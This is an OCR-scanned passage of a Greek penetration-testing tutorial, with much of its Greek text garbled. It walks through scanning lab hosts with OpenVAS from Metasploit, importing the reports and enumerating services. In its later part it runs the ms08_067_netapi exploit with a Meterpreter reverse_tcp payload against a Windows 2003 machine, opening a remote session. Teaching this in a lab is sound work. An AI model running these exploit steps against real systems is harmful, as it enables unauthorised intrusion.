έχουμε Hid μόνο epyaoia και η πρὀοδός της! εἶναι στο 64%. Αν µετά ano λίγη opa 
ελέγξουμε ξανά τη λίστα pe TIG εργασίες, θα δούμε ότι η uia και µοναδικἡ που υπάρ- 
χει, έχει τελειώσει: 


msf > openvas_task_list 
[+] OpenVAS list of tasks 


ID Name Comment Status Progress 


File Edit View History Bookmarks Tools Help 
πο Security Assistant — [se] 


© [8 15:/7152168.8555 


root@kali64: ~ 


Fie Edt View Search Terminal Help 


Έχουμε τον δικὀ µας OpenVAS server kai μπορούμε va συνδεόµαστε σ' αυτόν &íre απο rov web browser, 
cite ano To Metasploit. Μερικές φορὲς η σύνδεση µέσω web browser δεν εἰναι εφικτή, N.X., επειδή δεν 
βρισκόμαστε σε περιβάλλον γραφικών ή/και δεν λειτουργεί ο Greenbone Security Assistant. Πα τις 
περιπτώσεις αυτές, υπάρχει kai το plugin ονόματι openvas, yia το αγαπημένο µας Metasploit! Πα το πώς 
μπορείτε να στήσετε τον δικὀ σας OpenVAS server θα διαβάσετε στο ápOpo που ξεκινά ano τη σελίδα 42. 


1. Να µια ἄλλη λέξη για να περιγράψουμε την πορεία της εργασίας. 
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Πάρα πολύ ωραία. Στη στήλη Status υπάρχει η ἑνδειξη Done, που φυσικά σημαίνει 
ότι η εργασία ἐχει ολοκληρωθεί. Παρατηρήστε oT! για κάθε ολοκληρωμένη εργασίἰα, 
ο αντἰστοιχος αριθμὀς στη στήλη Progress εἶναι -1. 


Ξέρετε κάτι, ropa; Πριν SOULE TI μπορούμε να κάνουμε pE TIG ολοκληρωμένες εργα- 
dieg, εἶναι καλύτερα να φτιάξουμε Eva veo target, µια νέα εργασία γι' αυτό ro target, 
μετὰ να την ξεκινήσουμε και, αφού ολοκληρωθεἰ κι αυτή, UOTEPA να προχωρήσουμε 
παρακάτω ἐχοντας, πλέον, δύο εργασίες για va αξιοποιήσουμε: H pia δημιουργήθηκε 
και ξεκίνησε ano το περιβάλλον του GSA (ἴσως), η ἄλλη δημιουργήθηκε και ξεκίνησε 
ano το Metasploit, µέσω rou plugin ονόματι openvas. Σε ká8e περίπτωση, νομἰζουµε 
ότι έχετε αρχίσει να EKTINATE περισσότερο την αξία ενὸς ανεξάρτητου box/VM, σε 
ρόλο OpenVAS server. 


msf> openvas_help 


openvas. help 
openvas. debug 
openvas. version 


CONNECTION 
openvas_connect 
openvas_disconnect 


TARGETS 
openvas_target_create 
openvas. target delete 
openvas. target list 


TASKS 
openvas. task create 
openvas. task. delete 
openvas. task list 
openvas. task start 
openvas. task stop 
openvas. task pause 
openvas. task resume 


openvas. task resume. or. start 


CONFIGS 


openvas. config. list 


FORMATS 


παπεπεπεπεπαπα 


openvas_format_List 


REPORTS 

openvas. report list 
openvas. report. delete 
openvas. report. import 


Display this help 
Enable/Disable debugging 
Display the version of the OpenVAS server 


Connects to OpenVAS 
Disconnects from OpenVAS 


Create target 
Deletes target specified by ID 
Lists targets 


Create task 

Delete a task and all associated reports 
Lists tasks 

Starts task specified by ID 

Stops task specified by ID 

Pauses task specified by ID 

Resumes task specified by ID 

Resumes or starts task specified by ID 


Lists scan configurations 


Lists available report formats 


Lists available reports 
Delete a report specified by ID 
Imports an OpenVAS report specified by ID 


openvas. report. download Downloads an OpenVAS report specified by ID 


H &vroAr) openvas help rou openvas plugin yia To Metasploit, ειδικἀ στην αρχή θα 
μας φανεί ιδιαίτερα βολικἠ. Στο screenshot φαίνονται όλες οι EVTOAEG που karaAa- 
βαίνει το plugin, ομαδοποιημένες σε κατηγορίες. 
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Πα τη δηµιουργία ενὸς νέου target, υπάρχει η εντολἠ Openvas_target_create: 
msf > openvas_target_create 
[*] Usage: openvas_target_create <name> <hosts> <comment> 


Προσέξτε: Στη θἐση rou hosts μπορούμε va ἐχουμε περισσότερα ano éva IPs, τα 
οποία πρέπει να χωρίζονται μεταξύ τους µε κὀμματα. Εμεἰς ropa θα φτιάξουμε target 
για ἑνα μόνο ενεργὀ μηχάνημα, µε IP το 192.168.85.142. (Ἕνα εργαλεἰο για τον 
εντοπισμὀ ενεργὠν hosts εἶναι το netdiscover — κι αυτή η πληροφορία προορίζεται 
για όσους δεν παρακολουθούν τα επεισόδια Tou deltaCast :Ρ) 


msf > openvas target create newTarget 192.168.85.142 "Not-so-mysterious 
host" 


[*] OK, resource created: 973dd3dd-a423-4d4a-9cac-5fb0f953af67 
[+] OpenVAS list of targets 


ID Name Hosts Max Hosts In Use Comment 

e Localhost localhost 1 

1 newTarget 192.168.85.142 1 0 Not-so-mysterious 
host 

2  SingleWinHost 192.168.85.5 1 1 Must be the domain 
controller 


Με µια απλἠ κίνηση φτιάξαμε To veo target µε ὀνομα newTarget, yia Eva povo μηχὰ- 
νηµα µε IP ro 192.168.85.142. Αφήσαμε κι Eva σχόλιο, αυτό το "Not-so-mysterious 
host". Στο πλαἰσιο της napouoiaorng µας εἶναι ξεκάθαρα διακοσµητικὀ. Σε περίπτωση 
πολλών targets, όμως, θα μπορούσε ν' αποδειχθεἰ ιδιαϊτερα χρήσιμο. Εκτὸς ano τη 
δημιουργία του νέου target, η εντολή openvas target create επέστρεψε και τη 
λἰστα µε ὁλα Ta targets που αυτή τη στιγμή ἐχει o OpenVAS Manager. Αναρωτιέστε 
ποια εἶναι η λίστα θυρών (port list) yia To target µε ὀνομα newTarget; Εξ ορισμού, 
όσα targets δημιουργούνται µε τη βοήθεια του openvas plugin για το Metasploit, 
χρησιμοποιούν τη λίστα θυρών µε ὀνομα OpenVAS Default. Όπως υποδηλώνει και 
τ' ὀνομὰ της, εἶναι η προκαθορισμένη λίστα του OpenVAS. Περιλαμβάνει 4481 στο 
πλήθος TCP ports κι αν δεν µας κάνει τότε μπορούμε να ορίσουμε ἄλλη Aiota αλλά 
*óyi* ano εδώ. Πα την αλλαγή της λίστας εἶναι anapairnro να συνδεθούμε στο web 
panel του GSA, ano κάποιον web browser. Βέβαια κἀτι TETOIO δεν εἶναι πάντα εφικτό 
--ἰσως να µην τρἐχει καν o GSA daemon—, οπὀτε ac αρκεστούµε σε ὁπι µας nap£- 
χεται ano την κονσόλα του Metasploit. 


Ὦρα να φτιάξουμε µια νέα εργασία, για το νἐο µας target. Edw που έχουμε φτάσει, 
φανταζόμαστε OT! EXETE NON κατανοήσει την απλἠ λογική πίσω ano την ονομασία 
των EVTOAWV του Openvas plugin: 

msf > openvas_task_create 

[*] Usage: openvas task create «name» «comment» «config id» «target id» 


To target id rou target φαίνεται στην ἐξοδο της εντολἠς ορεπνᾶς target list, και 
εἶναι ro 1. Karavonra, επἰσης, Ta name kai comment, αλλά τι στο καλὀ eivai αυτό το 
config. id; Για ἄλλη µια φορά, Ooo! ἐχετε παρακολουθήσει ro deltaCast s02e01 uno- 
ψιάζεστε ὁτι ἐχει να κάνει HE TouG τρόπους κατὰ τους οποίους το OpenVAS σκανἀρει 
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για αδυναμίες. Υποψιάζεστε σωστά, φυσικἁ. Αν τώρα δώσετε KI ἑνα openvas_help, 
θα δείτε ότι υπάρχει η EvTOAN Openvas_config_list. Ας την εκτελέσουµε: 


msf > openvas_config list 

[+] OpenVAS list of configs 

ID Name 

0 empty 

1 Full and fast 

2 Full and fast ultimate 

3 Full and very deep 

4 Full and very deep ultimate 


Εδὠ εἰναι Aoirióv όλα Ta scan configs και τα αντίστοιχα IDs, οπὀτε yia τη νέα µας 
εργασἰα ας χρησιμοποιήσουμε το scan config 1 (Full and fast): 


msf > openvas task create newTask "Not-so-mysterious host" 1 1 
[*] OK, resource created: 6e0cef76-4563-4d3a-88d7-a2fc69d01aba 
[*] OpenVAS list of tasks 


ID Name Comment Status Progress 
0  newTask Not-so-mysterious host New -1 
1  SingleWinHost Must be the domain controller Done -1 


Ξεκινάμε ropa τη νέα εργασἰα µε την EVTOAN openvas task, start, divovTac της ως 
παράμετρο το αντίστοιχο task ID -- yia To παράδειγμά paç το 0: 


msf > openvas task start ϐ 
[*] OK, request submitted 

Την npoodo της εργασίας την παρακολουθούμε ἐτσι: 
msf > openvas_task_list 


[+] OpenVAS list of tasks 


ID Name Comment Status Progress 
© newTask Not-so-mysterious host Running 32 
1  SingleWinHost Must be the domain controller Done -1 


Στο προηγούμενο στιγμιότυπο, η εργασἰα βρἰσκεται στο 32%. Mia παραλλαγή yvo- 
στἠς θεωρἰας λέει ὁτι OOO πιο συχνά δίνουμε την EVTOAN Openvas_task_list, τόσο 
περισσότερο καθυστερεί η ολοκλήρωση της εργασίας. Σηκωθείτε, λοιπόν, και nn- 
γαίνετε να φτιάξτε Eva καφεδάκι — χωρίς όμως να σκέφτεστε την εργασἰα που στο 
μεταξύ τρέχει. Κάποια στιγμὴ, λίγο αργότερα, ENIOTPEWTE κι αδιάφορα πληκτρολο- 
γήστε: 
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msf > openvas_task_list 
[+] OpenVAS list of tasks 


ID Name Comment Status Progress 
©  newTask Not-so-mysterious host Done -1 
1  SingleWinHost Must be the domain controller Done -1 


Πολύ ωραία, η £pyacia µε ὀνομα newTask έχει ολοκληρωθεί! Μετην EVTOAN Openvas_ 
report download έχουμε τη δυνατότητα να κατεβάσουµε, στο τοπικό filesystem, µια 
αναφορά για κἄποια ολοκληρωμένη εργασία. H λἰστα pe Tic διαθἑσιµες εργασἰες του 
OpenVAS server Φαίνεται ἐτσι: 


msf > openvas_report_list 
[+] OpenVAS list of reports 
ID Task Name Start Time Stop Time 


θ SingleWinHost 2014-01-30T10:12:02+02:00 2014-01-30T10:17:46+02:00 
1 newTask 2014-01-30T12:21:23402:00 2014-01-30T12:41:46+02: 00 


Tic διαθέσιμες μορφές (formats) για τις αναφορές nou αποθηκεύουµε τοπικά, τις 
βλέπουμε µε την εντολἠ Openvas_format_list: 


msf > openvas_format_list 
[+] OpenVAS list of report formats 


ID Name Extension Summary 


0 ARF xml Asset Reporting Format v1.0.0. 

1 CPE csv Common Product Enumeration CSV table. 

2 HTML html Single page HTML report. 

3  ITG CSV German "IT-Grundschutz-Kataloge" report. 
4 LaTeX tex LaTeX source file. 

5 NBE nbe Legacy OpenVAS report. 

6 PDF pdf Portable Document Format report. 

7 TXT txt Plain text report. 

8 XML xml Raw XML report. 


Υπόψιν ὁτι μέσα ano To Metasploit δεν δουλεύουν όλα Ta formats. Ενώ, π.χ., μέσα 
ano ro web panel tou GSA μπορούμε va naipvoupe reports σε PDF, µε χρήση Tou 
openvas plugin περιέργως δεν μπορούμε. Δύο formats nou ὀντως δουλεύουν µέσα 
ano το openvas plugin, εἶναι τα HTML (ID 2) και XML (ID 8). Ta reports που αποθη- 
κεύουμε µε την EVTOAN Openvas_report_download, μπορούμε μετὰ va Ta φορτώ- 
σουµε στη βάση Tou Metasploit µε την εντολἠ db. import. Προφανώς, το βήμα της 
τοπικἠς αποθήκευσης δεν εἰναι πάντα επιθυμητὀ, οπότε γι’ αυτές τις περιπτώσεις 
υπάρχει η εντολἠ Openvas_report_import: 
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[*] Usage: openvas_report_import <report_id> <format_id> 


[*] Only the NBE and XML formats are supported for importing. 


Πα το σενάριο nou παρουσιάζουμε, το report id εἶναι To 1 και ro format_id nou 
γνωρίζουμε ὁτι θα δουλέψει εἶναι το 8 (XML): 


msf > « 


[*] Importing report to database. 


Μετά ano λίγη opa χρήσης rou openvas plugin yia ro Metasploit, η 
λογική πίσω and την ονομασία των υποστηριζόµενων εντολών γίνεται 
περισσότερο and προφανής. Καλό αυτό. 
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Δεν πήραμε κἀποιο μήνυμα λάθους — κι αυτό σηµαίνει ὁτι όλα ἐχουν πάει καλά. Ac 
εισάγουµε και TO report εκείνης της εργασίας nou βρήκαμε να τρἐχει ἠδη, όταν pop- 
τὠσαμε TO Openvas plugin. Το µόνο που θα αλλάξουμε σε σχέση µε την εντολἠ nou 
μόλις δώσαμε, εἶναι το report_id: 

msf > openvas_report_import ϐ 8 

[*] Importing report to database. 
Και τώρα nou φορτώσαμε Eva σωρό πληροφορἰες στη βάση του Metasploit, ας δούμε 
noc μπορούμε να τις αξιοποιήσουμε, ενδεχομένως για να αποκτήσουμε πρόσβαση 
στα μηχανήματα nou σκανάραμε για αδυναμίες. Δεν χρειαζόμαστε ἆλλο τη σύνδεση 
µε τον OpenVAS server, οπότε ας τον αποχαιρετίσουµε: 


msf > openvas_disconnect 


Αξιολόγηση ευρημάτων κι εκμετάλλευση αδυναμιὼν 


Πάντα ano το msfconsole, πληκτρολογούμε hosts yia να πάρουμε τα μηχανήματα 
που εἶναι αποθηκευμένα στη βάση του Metasploit, χάρη στην εισαγωγἠ των δύο 
vulnerability scans του OpenVAS που κάναμε πριν λἰγο: 


msf > hosts 


Hosts 

address mac name os_name os flavor os sp purpose info 
comments 

192.168.85.5 Unknown device 
192.168.85.142 Unknown device 


Δίνοντας κι va vulns, βλέπουμε ὁλες τις αναφορέἑς nepi αδυναμιὼν nou φορτώθη- 
καν στη βάση, πάντα χάρη στις προαναφερθείσες εισαγωγἐς. Όπως µπορεῖτε να δι- 
απιστώσετε απὀ την ἐξοδο της εντολἠς, για το παράδειγμά µας τουλάχιστον έχουμε 
µια εκτενέστατη λίστα nou δικαίως τρομάζει (BA. σχετικό screenshot). Υπόψιν ότι 
όλες οι αδυναμίες nou αναφέρει το OpenVAS, δεν σημαίνει ότι εἶναι πράγματι EKHE- 
ταλλεύσιμες. Επίσης, εἶναι πάντα πιθανὀ να υπάρχουν αδυναμίες nou το OpenVAS 
δεν εντόπισε. Για ἄλλη µια φορὰ, λοιπὀν, θα πούμε ὁτι σε τέτοιες περιπτώσεις η 
πείρα rou pen-tester τον βοηθά να βγάλει ἄκρη και να µην πελαγώσει. (O γράφων 
ἐχει πρακτικἁ μηδενικἠ πεῖρα µε ro pen-testing, υπολογίζει ωστόσο Ori θα μπορέσει 
να τα βγάλει πέρα και να ολοκληρώσει ro άρθρο. Κάπως παράξενη βέβαια αυτή η 
πρόταση, µε δεδομένο Ori τούτη τη στιγµή διαβάζετε ἠδη το άρθρο, το οποίο εἶναι 
μάλλον ολοκληρωμένο.) 


Μια ἄλλη, χρήσιμη εντολή αλληλεπίδρασης µε τη βάση rou Metasploit, εἶναι η 
services. Δουλειά της εἶναι να επιστρέφει τη λίστα µε τις υπηρεσίες που τρέχουν τα 
hosts της βάσης: 


msf > services 


Services 
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host port proto name state info 
192.168.85.5 23 tcp telnet open 
192.168.85.5 53 tcp domain open 
192.168.85.5 137 udp netbios-ns open 
192.168.85.5 138 udp netbios-dgm open 
192.168.85.5 139 tcp netbios-ssn open 
192.168.85.142 22 tcp ssh open 
192.168.85.142 3306 tcp mysql open 
192.168.85.142 3632 tcp distcc open 
192.168.85.142 5432 tcp postgresql open 
192.168.85.142 6667 tcp ircd open 


Δείτε για λίγο τις παραμέτρους που δέχονται οι εντολὲς hosts, services και vulns, 
εκτελώντας κἆθε uia µε την παράμετρο -h. Φιλτράροντας τα αποτελέσµατα των 
εντολὠν αυτών και OKENTOHEVO! συνδυαστικὰ, εἶναι πολύ πιθανὀ να βρούμε αδυνα- 
uie; που πράγματι θα μπορέσουμε να εκμεταλλευτούμε. Πριν απ' αυτό, ας βελτιώ- 
OOUHE λίγο τις πληροφορίες που γνωρίζουμε για ra hosts. Προς τούτο, καταφεύγου- 
µε αρχικά στο auxiliary module ονόματι smb_version: 

msf > use auxiliary/scanner/smb/smb_version 

msf auxiliary(smb_version) > set RHOSTS 192.168.85.5,142 

RHOSTS => 192.168.85.5,142 

msf auxiliary(smb_version) > run 


[*] 192.168.85.5:445 is running Windows 2003 No Service Pack (language: 
Unknown) (name:PARABING-DC) (domain:NOVLAN) 


[*] Scanned 1 of 2 hosts (050% complete) 


[*] 192.168.85.142:445 is running Unix Samba 3.0.20-Debian (language: 
Unknown) (domain:WORKGROUP) 


[*] Scanned 2 of 2 hosts (100% complete) 
[*] Auxiliary module execution completed 
msf auxiliary(smb version) » hosts 


Hosts 
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address mac name os_name os flavor os sp purpose 
info comments 

192.168.85.5 Microsoft Windows 2003 SPO server 
192.168.85.142 Linux Debian server 


msf auxiliary(smb version) » 
Όπως βλέπετε, πλέον γνωρἰζουµε αρκετά περισσότερα yia ra λειτουργικἁ συστἠ- 
ματα nou τρέχουν ra μηχανήματὰά µας. Ας δούμε λίγο καλύτερα τις υπηρεσίες του 
192.168.85.5, το οποίο Φαίνεται να τρέχει µια παραμελημένη εκδοχἠ των Windows 
2003 (δεν υπάρχει καν Service Pack): 


msf auxiliary(smb_version) > services 192.168.85.5 


Services 

host port proto name state info 
192.168.85.5 137 udp netbios-ns open 

192.168.85.5 137 tcp 

192.168.85.5 138 udp netbios-dgm open 

192.168.85.5 139 tcp netbios-ssn open 

192.168.85.5 389 udp ldap open 

192.168.85.5 389 tcp ldap open 

192.168.85.5 445 udp microsoft-ds open 

192.168.85.5 445 tcp smb open Windows 20@3 No 
Service Pack (language: Unknown) (name:PARABING-DC) (domain:NOVLAN) 


msf auxiliary(smb_version) > 


Μεταξύ ἄλλων ἐχει ενεργοποιημένη και την υπηρεσία file sharing των Windows 
(SMB), η οποία εἶναι ξακουστή yia τις αδυναμίες που κατὰ καιρούς εἰχε. Ας ρίξουμε 
μια πιο προσεκτικἠ ματιὰ στις αδυναμίες nou ἐχει εντοπίσει το OpenVAS: 


msf auxiliary(smb_version) > vulns 192.168.85.5 -s smb 


[*] Time: 2014-01-30 11:21:05 UTC Vuln: host-192.168.85.5 
name-Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - 
Remote refszCVE-2008-4114,CVE-2008-4834, CVE-2008-4835, BID- 31179 


[*] Time: 2014-01-30 11:21:05 UTC Vuln: host-192.168.85.5 name-Microsoft 
Windows SMB Server NTLM Multiple Vulnerabilities (971468) refs-CVE-2010- 
0020, CVE-2010-0021,CVE-2010-0022,CVE-2010-0231 


msf auxiliary(smb version) » 
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msf> services 


Services 


telnet 
name 
name 
domain 
domain 
kerberos 
kerberos 
ntp 
epmap 


netbios-ns 
netbios-dgm 
netbios-ssn 
ldap 

ldap 
microsoft-ds 
smb Windows 2003 No Service Pack (language: Unknown) (name:PARABING-DC) Cdomain:NOVLAN) 
kpasswd 
kpasswd 

isakmp 
http-rpc-epmap 
ldaps 
blackice-port-1002 
smtp 

ssh 

telnet 

ftp 

domain 

domain 

tftp 

http 

sunrpc 
netbios-ns 
netbios-ssn 
smb Unix Samba 3.0.20-Debian (language: Unknown) (domain: WORKGROUP) 
exec 

login 

shell 
rmiregistry 
ingreslock 

nfs 

nfs 
scientia-ssdb 
mysql 

distcc 
postgresql 

vnc 

x11 


Μετά ano την εισαγωγή των δύο vulnerability scans του OpenVAS στη βάση Tou 
Metasploit, ρίχνουμε µια ματιὰ στις υπηρεσίες των δύο μηχανημάτων στα οποία 
πρὀκειται να επιτεθοὐμε. Δεν εἶναι και λίγες... 


Εἶναι πολὺ πιθανὀ να υπάρχει κάτι Edw. Αξίζει να σταθούμε λἰγο και να διαβάσουμε 
για τις αδυναμίες αυτὲς, σημειώνοντας τα CVE numbers kal ψάχνοντας στην Exploit 
Database (www.exploit-db.com) ἡ ακόµη και στο Google. 


Σηµείωση. Στο Kali Linux υπάρχει εγκατεστημένο KI éva τοπικὀ αντίγραφο 
της Exploit Database. To εργαλείο searchsploit διευκολύνει τις αναζητήσεις 
στο εν λόγω archive. 


Βεβαίως, θα δούμε και τι oxerikà exploits διαθέτει το Metasploit. Το πρωτόκολλο 
nou µας ενδιαφἑρει εἶναι το SMB και θέλουμε exploits για Windows µε rank "great": 


msf auxiliary(smb version) > 


windows/fileformat/vlc_smb_uri 2009-06-24 great 
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow 
windows/smb/ms@8 067 netapi 2008-10-28 great 


Microsoft Server Service Relative Path Stack Corruption 
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windows/smb/netidentity_xtierrpcpipe 2009-04-06 great 
Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow 
windows/smb/timbuktu plughntcommand bof 2009- 
06-25 great Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer 
Overflow 


msf auxiliary(smb version) » 


Οι γραμμὲς στο αποτέλεσµα της παραπάνω αναζήτης εἶναι διπλωμένες και κάπως 
δυσανάγνωστες, ὁμως ano τα διαθέσιµα exploits auró nou αφορά στην υπηρεσία file 
sharing των Windows εἶναι το τονισμένο (ms08_067_netapi). Πα va βεβαιωθούμε 
πως δεν ψάχνουμε αλλού γι' αλλού, υπάρχει και η EVTOAN info: 


msf auxiliary(smb version) > info exploit/windows/smb/ms08 067 netapi 
Name: Microsoft Server Service Relative Path Stack Corruption 
Module: exploit/windows/smb/ms08 067 netapi 
Platform: Windows 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Great 


Available targets: 
Id Name 


© Automatic Targeting 
7 Windows 2003 SP@ Universal 
8 Windows 2003 SP1 English (NO NX) 


9 Windows 2003 SP1 English (NX) 


Basic options: 


Name Current Setting Required Description 
RHOST yes The target address 
RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use (BROWSER, 
SRVSVC) 
Payload information: 
Space: 400 


Avoid: 8 characters 


Description: 
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This module exploits a parsing flaw in the path canonicalization 

code of NetAPI32.dll through the Server Service. This module is 
capable of bypassing NX on some operating systems and service packs. 
The correct target must be used to prevent the Server Service (along 
with a dozen others in the same process) from crashing. Windows XP 
targets seem to handle multiple successful exploitation events, but 
2003 targets will often crash or hang on subsequent attempts. This 
is just the first version of this module, full support for NX bypass 


on 2003, along with other platforms, is still in development. 


References: 


http: //cvedetails.com/cve/20@8-4250/ 

http://www. osvdb.org/49243 

http: //www.microsoft.com/technet/security/bulletin/MS08-067.mspx 
http://www. rapid7.com/vulndb/lookup/dcerpc-ms-netapi- 


netpathcanonicalize-dos 


Μέχρι oriyuric, yia το MSO8_067_netapi ἐχουμε ra εξἠς δεδομένα: 


αφορά στην υπηρεσία SMB ki ἐχει rank great (οι παράμετροι της αναζήτη- 
ons µας) 
εἶναι remote exploit κι αυτό προκύπτει anó την περιγραφὴ του (ωραία) 


αφορά, μεταξύ ἄλλων λειτουργικών, στα Windows 2003 χωρίς Service Pack 
(ωραία) 


το CVE number που επιστρἑφει η εντολἠ info δεν υπάρχει στα CVE numbers 
των vulnerabilities που αναφέρει το OpenVAS (όχι και τόσο ωραία) 


Προφανώς τη συνταγἠ χαλὰ το τελευταίο δεδομένο — ἡ καλύτερα παρατήρηση. Ano 
την ἄλλη, δεν πρέπει να ξεχνάμε oT! το OpenVAS δεν εἶναι τέλειο. Δείχνει ὁμως προς 
μια γενικἠ κατεύθυνση —EV προκειμένω ευπάθειες που αφορούν στο πρωτόκολλο 
SMB— κι εμεἰς διαθέτουμε Eva remote exploit του Metasploit µε rank great, το οποίο 
αφορά επίσης στο SMB και μάλιστα ταιριάζει για το λειτουργικὀ σύστημα TOU OU- 
στήματος-στὀχου. Δεν χάνουμε τίποτε, λοιπὸν, να ro δοκιμάσουμε. (H διεύθυνση IP 
του μηχανήματος ano το onoio εργαζὀµαστε εἶναι η 192.168.85.20 και η διεύθυνση 
IP του στὀχου εἶναι η 192.168.85.5. Αυτὲς τις τιμὲς αποδἰδουµε παρακάτω στις pE- 
ταβλητέὲς LHOST και RHOST rou exploit, αντίστοιχα.) 
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msf auxiliary(smb version) > use exploit/windows/smb/ms08 067 netapi 


msf exploit(ms08 067 netapi) > show options 


Module options (exploit/windows/smb/msO8 067 netapi): 


Name Current Setting Required Description 
RHOST yes The target address 
RPORT 445 yes Set the SMB service port 
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SMBPIPE BROWSER yes The pipe name to use (BROWSER, 
SRVSVC) 


Exploit target: 
Id Name 
© Automatic Targeting 
msf exploit(ms08 067 netapi) > set RHOST 192.168.85.5 
RHOST => 192.168.85.5 
msf exploit(ms08 067 netapi) > set LHOST 192.168.85.20 
LHOST -» 192.168.85.20 
msf exploit(ms08 067 netapi) > set PAYLOAD windows/meterpreter/reverse tcp 


PAYLOAD => windows/meterpreter/reverse tcp 
msf exploit(ms08 067 netapi) » show options 
Module options (exploit/windows/smb/msO8 067 netapi): 


Name Current Setting Required Description 

RHOST 192.168.85.5 yes The target address 

RPORT 445 yes Set the SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, 
SRVSVC) 
Payload options (windows/meterpreter/reverse tcp): 

Name Current Setting Required Description 

EXITFUNC thread yes Exit technique: seh, thread, 
process, none 

LHOST 192.168.85.20 yes The listen address 

LPORT 4444 yes The listen port 
Exploit target: 

Id Name 


0 Automatic Targeting 
msf exploit(ms08 067 netapi) > run 
Started reverse handler on 192.168.85.20:4444 
Automatically detecting the target... 


Selected Target: Windows 2003 SP@ Universal 


[*] 
[*] 
[*] Fingerprint: Windows 2003 - No Service Pack - lang:Unknown 
[*] 
[*] Attempting to trigger the vulnerability... 
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[*] Sending stage (769024 bytes) to 192.168.85.5 


[*] Meterpreter session 1 opened (192.168.85.20:4444 -> 192.168.85.5:3405) 
at 2014-01-30 17:36:17 +0200 


meterpreter » sysinfo 


Computer : PARABING-DC 
OS : Windows .NET Server (Build 3790). 
Architecture : x86 


System Language : el GR 
Meterpreter : x86/win32 
meterpreter » background 

[*] Backgrounding session 1... 
msf exploit(ms08 067 netapi) » 


Επιτυχία! Na λοιπὸν nou εκτιμώντας τις πληροφορἰες του OpenVAS και στηριζόμενοι 
στα exploits Tou Metasploit, κατορθώσαμε ν' αποδεἰξουµε ὁτι το Eva εκ των δύο 
μηχανημάτων nou σκανάραμε εἶναι πράγματι ευπαθἑς. Βέβαια, στο σηµείο αυτό θα 
σκεφτεἰ κανεὶς ὁτι το δημοφιλές (;) ms08. 067 netapi, σε συνδυασμὀ µε µια τόσο 
παλιὰ ἐκδοση των Windows που μάλιστα δεν εἶναι ενημερωμένη, αποτελούν αυτό 
που δικαιολογημένα θα ονομάζαμε "ευκολάκι". Πράγματι, ETO! εἶναι, óuoc το onpa- 
VTIKO εδώ εἶναι να δούμε τον γενικὸ τρόπο σκέψης. Σε άλλα, δυσκολότερα σενάρια, 
TO OpenVAS ενδέχεται ν' αναφέρει αδυναμίες αλλά To Metasploit να µην ἐχει κανένα 
αξιόπιστο exploit να προσφἑρει. Τώρα nou το σκεφτόμαστε, διαγράψτε auro το "αξι- 
ὀπιστο": To Metasploit ενδέχεται να µη διαθέτει κανένα σχετικὀ exploit! Ακόμη και 
τότε υπάρχουν πράγματα που μπορούμε va δοκιμάσουμε, ὁμως όλα αυτά αποτελούν 
θέματα επόμενων ἄρθρων. Με την ευκαιρία, πάντως, πριν συνεχίσουμε θα θέλαμε va 
υπογραμμίσουμε κάτι που ούτως ἡ ἄλλως υπάρχει τουλάχιστον ως υποψία: To pen- 
testing δεν εἶναι uia γραμμική, οµαλἠ διαδικασία. Οι αποτυχἰες και τα αδιέξοδα ano- 
τελούν τον κανόνα και, τις περισσότερες φορές, EKTOG απὀ τη φαντασία απαιτούνται 
συστηματικό ψάξιμο κι απειραριθµἠήσιµες δοκιμές. Επιπρὀσθετα, δεν εἶναι διόλου 
απίθανο να δοκιμάζονται και οι προγραμματιστικὲς ικανότητες του pen-tester, o 
οποίος σε κάποιες περιπτώσεις καλείται v' αναπτύξει ra δικἁ rou exploits. (Κόντρα 
σε µια φήμη που κατὰ καιροὺς οργιάζει, αυτά δεν αναπτύσσονται απὀ μόνα τους.) 


Ας δούμε τὠρα και το GAAO μηχάνημα, αυτὸ nou τρἐχει Linux κι ἐχει IP το 
192.168.85.142. Ξεκινάμε ρἰχνοντας µια ματιὰ στις υπηρεσίες του: 


msf exploit(ms08 067 netapi) > back 
msf» services 192.168.85.142 


Services 

host port proto name state info 
192.168.85.142 21 tcp ftp open 
192.168.85.142 22 tcp ssh open 
192.168.85.142 23 tcp telnet open 
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192.168.85.142 3306 tcp mysql open 
192.168.85.142 3632 tcp distcc open 
192.168.85.142 5432 tcp postgresql open 
192.168.85.142 5900 tcp vnc open 
192.168.85.142 20000 tcp x11 open 
192.168.85.142 6667 tcp ircd open 
192.168.85.142 8009 tcp ajp13 open 
192.168.85.142 8787 tcp msgsrvr open 


Vuln: host-192.168.85.142 name-PHP version smaller than 5.3.3 refs-CVE-2010-1917,CVE-2010- VE-2010-3063 , CVE-2010-3064 , BID-40461 
Time: 2014-01-30 11 Vuln: host-192.168.85.142 name-TikiWiki Versions Prior to 4.2 Multiple Unspecified Vulnerabilities refs=CVE-2010-1135,CVE-2010-1134, CVE-2010-1133, CVE-2010-11 
36, BID-38608 
Time: 2014-01-30 11:16:37 UTC Vuln: host=192.168.85.142 name-PHP-CGI-based setups vulnerability when parsing query string parameters from php files. refs-CVE-2012-1823,CVE-2012-2311,CVE-2 
12-2336, CVE-2012-2335 , BID-53388 
Time: 2014-01-30 11:16:37 UTC Vuln: host=192.168.85.142 name=PHP version smaller than 5.2.11 refs=CVE-2009-3291, CVE-2009-3292 , CVE-2009-3293 , CVE-2009-3294 , CVE-2009-4018, CVE-2009-5016,BID-3 


Vuln: host=192.168.85.142 name=PHP version smaller than 5.3.1 refs-CVE-2009-3557,CVE-2009-3559,CVE-2009-4017, CVE-2010-1128,B10-36554, BID-36555,8I0-37079, BID- 


Time: 2014-01-30 11 Vuln; host-192.168.85.142 name=PHP version smaller than 5.2.8 refs-CVE-2008-5814, CVE-2008-5844, BID-32673 
Time: 2014-01-30 11 Vuln: host-192.168.85.142 name=PHP version smaller than 5.3.4 refs-CVE-2006-7243,CVE-2010-2094, CVE-2010-2950, CVE-2010-3436, CVE-2010-3709, CVE-2010-3710, CVE-20 
10-3870, CVE-2010-4150, CVE-2010-4156, CVE-2010-4409 , CVE-2010-4697 , CVE-2010-4698 , CVE-2010-4699,, CVE-2010-4700, CVE-2011-0753, CVE-2011-0754, CVE-2011-0755, BID-40173,BID-43926, BID-44605,BID-44718, BID 
